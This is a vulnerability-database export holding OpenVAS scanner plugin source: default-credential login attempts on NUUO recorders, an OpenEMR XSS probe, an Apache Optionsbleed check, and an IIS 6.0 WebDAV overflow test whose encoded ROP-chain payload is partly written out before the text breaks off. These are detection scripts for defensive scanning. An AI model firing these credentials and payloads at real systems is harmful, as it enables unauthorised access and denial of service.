ID SECURITYVULNS:VULN:11008
Type securityvulns
Reporter BUGTRAQ
Modified 2010-07-18T00:00:00
Description
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
{"id": "SECURITYVULNS:VULN:11008", "bulletinFamily": "software", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2010-07-18T00:00:00", "modified": "2010-07-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11008", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:24270", "https://vulners.com/securityvulns/securityvulns:doc:24271"], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:09:37", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "c6f6fcc8d3e63fc0bce704800e7e5ce8"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "c61e5d59aa5c4e535b518cca44e00a6f"}, {"key": "href", "hash": "f693a90d39ab065c9ba80d6d95d4b362"}, {"key": "modified", "hash": "2a282cf33acfcad76ffdd1fec84c0639"}, {"key": "published", "hash": "2a282cf33acfcad76ffdd1fec84c0639"}, {"key": "references", "hash": "d4c35f77d0771fd8254132139e417d60"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "9caff91e9ebcf551c6d0d9d96b286138"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "47143764d5432c4be9319622a3a400b18321147ee96896137285d2ea814d567d", "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-08-31T11:09:37"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "affectedSoftware": [{"name": "Conpresso CMS", "operator": "eq", "version": "4.1"}, {"name": "Redshop", "operator": "eq", "version": "1.0"}]}
{"openvas": [{"lastseen": "2018-09-12T13:28:45", "references": [], "pluginID": "1361412562310112328", "description": "NUUO Network Video Recorder devices have default credentials.", "edition": 4, "reporter": "This script is Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-17T00:00:00", "title": "NUUO Network Video Recorder Devices Default Credentials", "type": "openvas", "enchantments": {"score": {"modified": "2018-09-12T13:28:45", "vector": "NONE", "value": 7.5}}, "naslFamily": "Default Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6553"], "modified": "2018-09-11T00:00:00", "id": "OPENVAS:1361412562310112328", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112328", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nuuo_nvr_default_credentials.nasl 11317 2018-09-11 08:57:27Z asteins $\n#\n# NUUO Network Video Recorder Devices Default Credentials\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:nuuo:nuuo\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112328\");\n script_version(\"$Revision: 11317 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-11 10:57:27 +0200 (Tue, 11 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-17 11:26:00 +0200 (Tue, 17 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-6553\");\n script_bugtraq_id(93807);\n\n script_name(\"NUUO Network Video Recorder Devices Default Credentials\");\n\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_dependencies(\"gb_nuuo_devices_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8081);\n script_mandatory_keys(\"nuuo/web/detected\");\n\n script_tag(name:\"solution\", value:\"Nuuo has released an update to address the issue. Please see the vendor information.\n\n As a general good security practice, only allow trusted hosts to connect to the device.\n Use of strong, unique passwords can help reduce the efficacy of brute force password guessing attacks.\");\n\n script_tag(name:\"summary\", value:\"NUUO Network Video Recorder devices have default credentials.\");\n\n script_tag(name:\"impact\", value:\"This issue may be exploited by a remote attacker to gain\n access to sensitive information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\ncookie = get_kb_item(\"nuuo/web/cookie\");\nif( isnull( cookie ) ) exit( 0 );\n\n# GET request to fetch a fresh cookie\nreq = http_get( port:port , item:\"/\" );\nres = http_keepalive_send_recv( port:port, data:req );\n\ncookie_match = eregmatch( pattern:'Set-Cookie: ([^\\r\\n]+)', string:res );\nif( cookie_match[1] ){\n cookie = cookie_match[1];\n} else {\n exit(0);\n}\n\nvuln = FALSE;\nreport = \"\";\n\ncredentials = make_list( \"admin:admin\", \"localdisplay:111111\" );\n\nuseragent = get_http_user_agent();\nhost = http_host_name( port:port );\n\nforeach credential( credentials ) {\n\n user_pass = split( credential, sep:\":\", keep:FALSE );\n\n user = chomp( user_pass[0] );\n pass = chomp( user_pass[1] );\n\n if( tolower( pass ) == \"none\" ) pass = \"\";\n\n data = string( 'language=en&user=' + user + '&pass=' + pass + '&submit=Login' );\n len = strlen( data );\n\n req = 'POST /login.php HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/login.php/\\r\\n' +\n 'Cookie: ' + cookie + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n 'Content-Type: application/x-www-form-urlencoded\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n '\\r\\n' +\n data;\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( res =~ \"HTTP/1.. 302\" && \"/setting.php\" >< res ) {\n\n req = 'GET /setting.php HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/setting.php\\r\\n' +\n 'Cookie: ' + cookie + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n '\\r\\n';\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( '<span class=\"productName\">' >< res || '<div id=\"official_fw_ver\">' >< res ) {\n vuln = TRUE;\n report += 'It was possible to login into the NUUO Network Video Recorder Administration at ' + report_vuln_url( port:port, url:'/login.php', url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\".\\r\\n';\n product_match = eregmatch( pattern:'<span class=\"productName\">([A-Z0-9-]+)</span>', string:res );\n\n if( product_match[1] ) {\n product = product_match[1];\n }\n }\n }\n}\n\n# nb: This is placed outside the loop to not be reported multiple times if multiple logins were possible.\nif( product ) {\n set_kb_item(name:'nuuo/model', value:product);\n report += '\\r\\nThe running device is a NUUO ' + product + '.';\n}\n\nif( vuln ) {\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:36:11", "references": ["https://www.sec-consult.com/en/blog/advisories/os-command-injection-reflected-cross-site-scripting-in-openemr/index.html", "http://www.open-emr.org/wiki/index.php/OpenEMR_Patches"], "pluginID": "1361412562310113110", "description": "OpenEMR 5.0.0 is prone to multiple vulnerabilities.", "edition": 7, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-02-13T00:00:00", "title": "OpenEMR 5.0.0 Multiple Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1000019", "CVE-2018-1000020"], "modified": "2018-08-16T00:00:00", "id": "OPENVAS:1361412562310113110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113110", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_openemr_mult_vuln.nasl 11008 2018-08-16 13:26:16Z cfischer $\n#\n# OpenEMR 5.0.0 Multiple Vulnerabilities\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113110\");\n script_version(\"$Revision: 11008 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-16 15:26:16 +0200 (Thu, 16 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-13 13:30:33 +0100 (Tue, 13 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-1000019\", \"CVE-2018-1000020\");\n\n script_name(\"OpenEMR 5.0.0 Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_openemr_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"openemr/installed\");\n\n script_tag(name:\"summary\", value:\"OpenEMR 5.0.0 is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"The script attempts to exploit an XSS vulnerability, and reports the vulnerability, if successful.\");\n script_tag(name:\"insight\", value:\"OpenEMR is prone to an authenticated OS Command Injection vulnerability and an unauthenticated XSS vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to fully compromise the target system.\");\n script_tag(name:\"affected\", value:\"OpenEMR 5.0.0 and prior.\");\n script_tag(name:\"solution\", value:\"Update to version 5.0.0 Patch 7 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.sec-consult.com/en/blog/advisories/os-command-injection-reflected-cross-site-scripting-in-openemr/index.html\");\n script_xref(name:\"URL\", value:\"http://www.open-emr.org/wiki/index.php/OpenEMR_Patches\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:open-emr:openemr\";\n\ninclude( \"host_details.inc\" );\ninclude( \"http_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! location = get_app_location( cpe: CPE, port: port ) ) exit( 0 );\n\nuseragent = get_http_user_agent();\nhost = http_host_name( port: port );\n\ntimestamp = ereg_replace( string: gettimeofday(), pattern: \".\", replace: \"_\" );\nexploit_url = location + \"/library/custom_template/ckeditor/_samples/assets/_posteddata.php\";\nexploit_url = ereg_replace( string: exploit_url, pattern: \"//\", replace: \"/\" );\nexploit_pattern = \"<script>alert('\" + timestamp + \"');</script>\";\nexploit = exploit_pattern + \"=SENDF\";\n\nreq = 'POST ' + exploit_url + ' HTTP/1.1\\r\\n';\nreq += 'User-Agent: ' + useragent + '\\r\\n';\nreq += 'Host: ' + host + '\\r\\n';\nreq += 'Accept: */*\\r\\n';\nreq += 'Content-Length: ' + strlen( exploit ) + '\\r\\n';\nreq += 'Content-Type: application/x-www-form-urlencoded\\r\\n\\r\\n';\nreq += exploit;\n\nif( ! resp = http_send_recv( port: port, data: req ) ) exit( 0 );\n\nif( exploit_pattern >< resp ){\n report = report_vuln_url( port: port, url: exploit_url );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:45:05", "references": ["https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html", "http://openwall.com/lists/oss-security/2017/09/18/2", "https://www.apache.org/dist/httpd/CHANGES_2.4.28", "http://www.securityfocus.com/bid/100872", "https://archive.apache.org/dist/httpd/patches/apply_to_2.2.34/"], "pluginID": "1361412562310112048", "description": "Apache HTTP server allows remote attackers to read secret data\n from process memory if the Limit directive can be set in a user", "edition": 8, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-09-20T00:00:00", "title": "Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2018-08-16T00:00:00", "id": "OPENVAS:1361412562310112048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112048", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_optionsbleed.nasl 11008 2018-08-16 13:26:16Z cfischer $\n#\n# Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112048\");\n script_version(\"$Revision: 11008 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-16 15:26:16 +0200 (Thu, 16 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 12:53:35 +0200 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2017-9798\");\n script_bugtraq_id(100872);\n script_name(\"Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2017/09/18/2\");\n script_xref(name:\"URL\", value:\"https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/100872\");\n script_xref(name:\"URL\", value:\"https://archive.apache.org/dist/httpd/patches/apply_to_2.2.34/\");\n script_xref(name:\"URL\", value:\"https://www.apache.org/dist/httpd/CHANGES_2.4.28\");\n\n script_tag(name:\"summary\", value:\"Apache HTTP server allows remote attackers to read secret data\n from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf\n has certain misconfigurations, aka Optionsbleed.\");\n\n script_tag(name:\"vuldetect\", value:\"This script checks for a corrupted Allow header that is being\n constructed in response to HTTP OPTIONS requests.\");\n\n script_tag(name:\"insight\", value:\"Optionsbleed is a use after free error in Apache HTTP server that\n causes a corrupted Allow header to be constructed in response to HTTP OPTIONS requests. This can leak\n pieces of arbitrary memory from the server process that may contain secrets. The memory pieces change\n after multiple requests, so for a vulnerable host an arbitrary number of memory chunks can be leaked.\n\n The bug appears if a webmaster tries to use the 'Limit' directive with an invalid HTTP method.\n\n Example .htaccess:\n\n <Limit abcxyz>\n </Limit>\");\n\n script_tag(name:\"impact\", value:\"The successful exploitation allows the attacker to read chunks of the\n host's memory.\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP Server 2.2.x versions up to 2.2.34 and 2.4.x below 2.4.28.\");\n\n script_tag(name:\"solution\", value:\"Update to Apache HTTP Server 2.4.28. For Apache HTTP Server running\n version 2.2.34 apply the patch linked in the references.\n\n As a workaround the usage of .htaccess should be disabled competely via the 'AllowOverride None'\n directive within the webservers configuration. Furthermore all <Limit> statements within the\n webserver configuration needs to be verified for invalid HTTP methods.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nget_app_location(cpe:CPE, port:port, nofork:TRUE); # To have a reference to the Detection-NVT\n\nuseragent = get_http_user_agent();\nhost = http_host_name(port:port);\n\n#TODO: Once this vulnerability got older we might want to consider to limit the amounts of directories to check here\nforeach dir(make_list_unique(\"/\", cgi_dirs(port:port)))\n{\n\n if(dir == \"/\") dir = \"\";\n url = dir + \"/\";\n\n req = 'OPTIONS ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Connection: Close\\r\\n\\r\\n';\n\n for(i = 0; i <= 100; i++)\n {\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n if(res =~ \"^HTTP/1\\.[01] 405\" ) break; # We don't need to continue in this inner loop if the OPTIONS method is disabled.\n if(allow = egrep(string:res, pattern:\"^Allow: .*\" ))\n {\n # Examples:\n # Allow: POST,OPTIONS,,HEAD,:09:44 GMT\n # Allow: ,GET,HEAD,POST,OPTIONS\n # Allow: HEAD,,HEAD,POST,,HEAD,TRACE\n # Allow: POST,OPTIONS,GET,HEAD,,HEAD,write.c>\n if(vuln = eregmatch(pattern:\"(\\,{2,}|\\,\\W+\\,|^\\w+\\:[\\s]{0,}\\,|\\d)\", string:allow))\n {\n report = \"The remote service might leak data/memory via the 'Allow' header.\";\n report += '\\n\\nRequest:\\n' + req + '\\nResponse:\\n' + res;\n security_message(port:port, data:report);\n exit(0);\n }\n }\n }\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:42:45", "references": ["http://www.securityfocus.com/bid/97127", "https://github.com/edwardz246003/IIS_exploit", "https://support.microsoft.com/en-us/help/3197835/description-of-the-security-update-for-windows-xp-and-windows-server"], "pluginID": "1361412562310140228", "description": "Microsoft Internet Information Services is prone to a buffer overflow\n vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an\n insufficiently sized memory buffer.", "edition": 8, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-03-30T00:00:00", "title": "Microsoft Internet Information Services Buffer Overflow Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7269"], "modified": "2018-08-16T00:00:00", "id": "OPENVAS:1361412562310140228", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140228", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_iis6_97127.nasl 11008 2018-08-16 13:26:16Z cfischer $\n#\n# Microsoft Internet Information Services Buffer Overflow Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:iis\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140228\");\n script_bugtraq_id(97127);\n script_cve_id(\"CVE-2017-7269\");\n script_version(\"$Revision: 11008 $\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-16 15:26:16 +0200 (Thu, 16 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-30 17:46:17 +0200 (Thu, 30 Mar 2017)\");\n script_name(\"Microsoft Internet Information Services Buffer Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_ms_iis_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/97127\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3197835/description-of-the-security-update-for-windows-xp-and-windows-server\");\n script_xref(name:\"URL\", value:\"https://github.com/edwardz246003/IIS_exploit\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to execute arbitrary code in the context\n of the affected application. Failed exploit attempts will result in denial-of-service conditions.\");\n\n script_tag(name:\"vuldetect\", value:\"Check the version and if WebDAV is enabled.\");\n\n script_tag(name:\"solution\", value:\"Microsoft has addressed this issue and provided an update.\n Head over to the references and download and install the necessary update for your system.\");\n\n script_tag(name:\"summary\", value:\"Microsoft Internet Information Services is prone to a buffer overflow\n vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an\n insufficiently sized memory buffer.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Information Services 6.0 running on Microsoft\n Windows Server 2003 R2 is vulnerable, other versions may also be affected.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers != \"6.0\" ) exit( 99 );\n\nuseragent = get_http_user_agent();\nhost = http_host_name( port:port );\n\nreq = 'OPTIONS / HTTP/1.1\\r\\n';\nreq += 'Host: ' + host + '\\r\\n';\nreq += 'User-Agent: ' + useragent + '\\r\\n';\nreq += '\\r\\n';\n\nres_1 = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( \"Allow:\" >!< res_1 || \"MS-Author-Via: DAV\" >!< res_1 ) exit( 99 );\n\nline = egrep( pattern:'^Allow:', string:res_1 );\n\nif( \"PROPFIND\" >< line ) {\n\n # The payload sets up a ROP chain by using the overflow 3 times.\n # written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China\n pay='PROPFIND / HTTP/1.1\\r\\nHost: ' + host + '\\r\\nContent-Length: 0\\r\\n';\n pay+='If: <http://' + host + '/aaaaaaa';\n pay+=\"\\xe6\\xbd\\xa8\\xe7\\xa1\\xa3\\xe7\\x9d\\xa1\\xe7\\x84\\xb3\\xe6\\xa4\\xb6\\xe4\\x9d\\xb2\\xe7\\xa8\\xb9\\xe4\\xad\\xb7\\xe4\\xbd\\xb0\\xe7\\x95\\x93\\xe7\\xa9\\x8f\\xe4\\xa1\\xa8\\xe5\\x99\\xa3\\xe6\\xb5\\x94\\xe6\\xa1\\x85\\xe3\\xa5\\x93\\xe5\\x81\\xac\\xe5\\x95\\xa7\\xe6\\x9d\\xa3\\xe3\\x8d\\xa4\\xe4\\x98\\xb0\\xe7\\xa1\\x85\\xe6\\xa5\\x92\\xe5\\x90\\xb1\\xe4\\xb1\\x98\\xe6\\xa9\\x91\\xe7\\x89\\x81\\xe4\\x88\\xb1\\xe7\\x80\\xb5\\xe5\\xa1\\x90\\xe3\\x99\\xa4\\xe6\\xb1\\x87\\xe3\\x94\\xb9\\xe5\\x91\\xaa\\xe5\\x80\\xb4\\xe5\\x91\\x83\\xe7\\x9d\\x92\\xe5\\x81\\xa1\\xe3\\x88\\xb2\\xe6\\xb5\\x8b\\xe6\\xb0\\xb4\\xe3\\x89\\x87\\xe6\\x89\\x81\\xe3\\x9d\\x8d\\xe5\\x85\\xa1\\xe5\\xa1\\xa2\\xe4\\x9d\\xb3\\xe5\\x89\\x90\\xe3\\x99\\xb0\\xe7\\x95\\x84\\xe6\\xa1\\xaa\\xe3\\x8d\\xb4\\xe4\\xb9\\x8a\\xe7\\xa1\\xab\\xe4\\xa5\\xb6\\xe4\\xb9\\xb3\\xe4\\xb1\\xaa\\xe5\\x9d\\xba\\xe6\\xbd\\xb1\\xe5\\xa1\\x8a\\xe3\\x88\\xb0\\xe3\\x9d\\xae\\xe4\\xad\\x89\\xe5\\x89\\x8d\\xe4\\xa1\\xa3\\xe6\\xbd\\x8c\\xe7\\x95\\x96\\xe7\\x95\\xb5\\xe6\\x99\\xaf\\xe7\\x99\\xa8\\xe4\\x91\\x8d\\xe5\\x81\\xb0\\xe7\\xa8\\xb6\\xe6\\x89\\x8b\\xe6\\x95\\x97\\xe7\\x95\\x90\\xe6\\xa9\\xb2\\xe7\\xa9\\xab\\xe7\\x9d\\xa2\\xe7\\x99\\x98\\xe6\\x89\\x88\\xe6\\x94\\xb1\\xe3\\x81\\x94\\xe6\\xb1\\xb9\\xe5\\x81\\x8a\\xe5\\x91\\xa2\\xe5\\x80\\xb3\\xe3\\x95\\xb7\\xe6\\xa9\\xb7\\xe4\\x85\\x84\\xe3\\x8c\\xb4\\xe6\\x91\\xb6\\xe4\\xb5\\x86\\xe5\\x99\\x94\\xe4\\x9d\\xac\\xe6\\x95\\x83\\xe7\\x98\\xb2\\xe7\\x89\\xb8\\xe5\\x9d\\xa9\\xe4\\x8c\\xb8\\xe6\\x89\\xb2\\xe5\\xa8\\xb0\\xe5\\xa4\\xb8\\xe5\\x91\\x88\\xc8\\x82\\xc8\\x82\\xe1\\x8b\\x80\\xe6\\xa0\\x83\\xe6\\xb1\\x84\\xe5\\x89\\x96\\xe4\\xac\\xb7\\xe6\\xb1\\xad\\xe4\\xbd\\x98\\xe5\\xa1\\x9a\\xe7\\xa5\\x90\\xe4\\xa5\\xaa\\xe5\\xa1\\x8f\\xe4\\xa9\\x92\\xe4\\x85\\x90\\xe6\\x99\\x8d\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe4\\xa0\\xb4\\xe6\\x94\\xb1\\xe6\\xbd\\x83\\xe6\\xb9\\xa6\\xe7\\x91\\x81\\xe4\\x8d\\xac\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe5\\x8d\\x83\\xe6\\xa9\\x81\\xe7\\x81\\x92\\xe3\\x8c\\xb0\\xe5\\xa1\\xa6\\xe4\\x89\\x8c\\xe7\\x81\\x8b\\xe6\\x8d\\x86\\xe5\\x85\\xb3\\xe7\\xa5\\x81\\xe7\\xa9\\x90\\xe4\\xa9\\xac\";\n pay+='>';\n pay+=' (Not <locktoken:write1>) <http://' + host + '/bbbbbbb';\n 